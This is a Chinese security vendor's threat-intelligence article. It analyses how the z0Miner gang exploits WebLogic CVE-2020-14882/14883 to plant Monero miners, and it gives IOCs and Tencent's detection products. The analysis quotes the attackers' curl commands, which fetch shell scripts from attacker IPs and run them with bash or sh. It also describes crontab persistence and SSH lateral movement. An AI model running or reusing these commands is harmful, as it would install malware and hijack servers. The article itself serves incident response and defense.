产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
运维解决方案
品牌保护解决方案
高防云主机安全
腾讯安心平台解决方案
行业解决方案
游戏行业安全方案
电商行业安全方案
零售行业安全方案
安全专项解决方案
勒索病毒专项解决方案
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
开启你的安全之旅
联系我们
寻求市场合作
友情链接
腾讯云

- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录

z0Miner挖矿木马利用Weblogic最新漏洞入侵,腾讯主机安全(云镜)极速捕捉
2020-11-03 11:29:43
一、背景
腾讯主机安全(云镜)于2020.11.02日捕获到挖矿木马团伙z0Miner利用Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)的攻击行动。该团伙通过批量扫描云服务器发现具有Weblogic漏洞的机器,发送精心构造的数据包进行攻击。之后执行远程命令下载shell脚本z0.txt运行,再利用该shell脚本植入门罗币挖矿木马、挖矿任务本地持久化,以及通过爆破SSH横向移动。根据该团伙控制的算力推算,已有大约5000台服务器受害。
由于Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)10月21日才被官方公布,有许多企业未来得及修复,同时该漏洞的补丁存在被绕过的风险。因此该挖矿木马可能对云主机造成较大威胁。
腾讯安全建议企业检查服务器上是否存在文件/tmp/javax/ssd2,检查crontab定时任务中是否存在可疑下载命令,删除挖矿木马文件和相关任务,检查Weblogic是否属于受影响版本并及时采取修复措施。
腾讯安全主机安全(云镜)、云防火墙、漏洞扫描系统、腾讯高级威胁检测系统(御界)均于10月28日升级,支持对该漏洞以及随后的补丁绕过风险进行检测和拦截。Oracle也于11月2日发布新更新,以解决CVE-2020-14882补丁被绕过的风险。腾讯安全专家建议用户尽快将Weblogic组件升级到最新版本。
腾讯安全系列产品应对z0Miner挖矿木马家族的响应清单如下:
应用 场景 |
安全产品 |
解决方案 |
威 胁 情 报 |
腾讯T-Sec 威胁情报云查服务 (SaaS) |
1)z0Miner挖矿木马相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
腾讯T-Sec 高级威胁追溯系统 |
1)z0Miner挖矿木马相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
云原生安全 防护 |
云防火墙 (Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持: 1)已支持识别检测z0Miner挖矿木马关联的IOCs; 2)已支持检测和拦截Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)
有关云防火墙的更多信息,可参考: |
腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) |
1)已支持查杀z0Miner相关木马程序; 2)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
腾讯T-Sec 安全运营中心 |
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
非云企业安全防护 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
1)已支持检测Weblogic未授权命令执行漏洞(CVE-2020-14882/14883)
关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
二、详细分析
10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中多个Weblogic组件相关高危漏洞引起业界高度关注。未经授权的攻击者可以绕过WebLogic后台登录等限制,直接远程利用反序列化漏洞,从而接管WebLogic服务器,风险极大。
10月28日,腾讯安全团队关注到互联网上已出现CVE-2020-14882和CVE-2020-14883两个高危漏洞POC(验证代码),未经身份验证的远程攻击者可能通过构造特殊的HTTP GET请求,利用该漏洞在受到攻击的WebLogic Server上执行任意代码。漏洞影响Oracle WebLogic Server的多个版本:
10.3.6.0.0
12.1.3.0.0
12.2.1.3.0
12.2.1.4.0
14.1.1.0.0
11月02日腾讯云捕获到挖矿木马z0Miner利用CVE-2020-14882的攻击行为。攻击者精心构造具有CVE-2020-14882漏洞利用代码的数据包后,通过210.108.70.119向目标服务器发送请求。
漏洞攻击成功后在Payload中执行远程代码:
1.curl -fsSL http[:]//218.61.5.109/errors/z0.txt -o /tmp/solr
2.bash /tmp/solr
该代码下载shell脚本z0.txt保存为/tmp/solr并通过bash命令执行。z0.txt首先通过匹配进程和文件名清除竞品挖矿木马。
然后安装crontab定时任务进行持久化,定期下载木马https[:]//pastebin.com/raw/kkMGTEB4以及shell脚本https[:]//pastebin.com/raw/kkMGTEB4到失陷主机上运行,目前该URL返回数据为“exit”,可能在后续攻击中添加恶意代码。
通过SSH远程登陆已经认证过的机器进行横向移动,并在感染后执行远程命令:
curl -fsSL http[:]//189.7.105.47:8181/examples/jsp/z0.txt | sh
最后下载门罗币挖矿木马javae.exe保存至/tmp/javax/ssd2,通过脚本config.sh启动挖矿。
挖矿木马采用开源挖矿程序XMRig编译,挖矿使用钱包
43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY。
由于该木马刚刚上线,目前挖矿获得收益只有0.1个XMR,但根据其算力133 KH/s推算其已控制约5000台服务器进行挖矿。
IOCs
IP
222.108.2.20
218.61.5.109
189.7.105.47
210.108.70.119
Md5
javae.exe 373b018bef17e04d8ff29472390403f9
z0.txt 48072a4ad46bf20ddd6fdc6a19155c78
z0.txt 067a531e8580fe318ebff0b4038fbe6b
config.sh 5020b71e9cd1144c57f39c9d4072201b
URL
http[:]//222.108.2.20/about/javae.exe
http[:]//218.61.5.109/errors/z0.txt
http[:]//218.61.5.109/errors/config.sh
http[:]//189.7.105.47:8181/examples/jsp/config.json
http[:]//189.7.105.47:8181/examples/jsp/config.sh
http[:]//189.7.105.47:8181/examples/jsp/z0.txt
https[:]//pastebin.com/raw/qKcPmSNp
https[:]//pastebin.com/raw/kkMGTEB4
钱包:
43vpvnvubbGUMuGffKAbwfeDYHRiDtBKWKUcncVttFMYHJyPV6DbHG7b3oSXSK52Fe3VF27zi9ai2CqCRcUvMmDbNMGWpuY
参考链接:
https://mp.weixin.qq.com/s/LIjO2St8PdvXm3lS5wsJPQ
https://mp.weixin.qq.com/s/6qsjUMJaUpUQHZYdsB3Ntw

在线咨询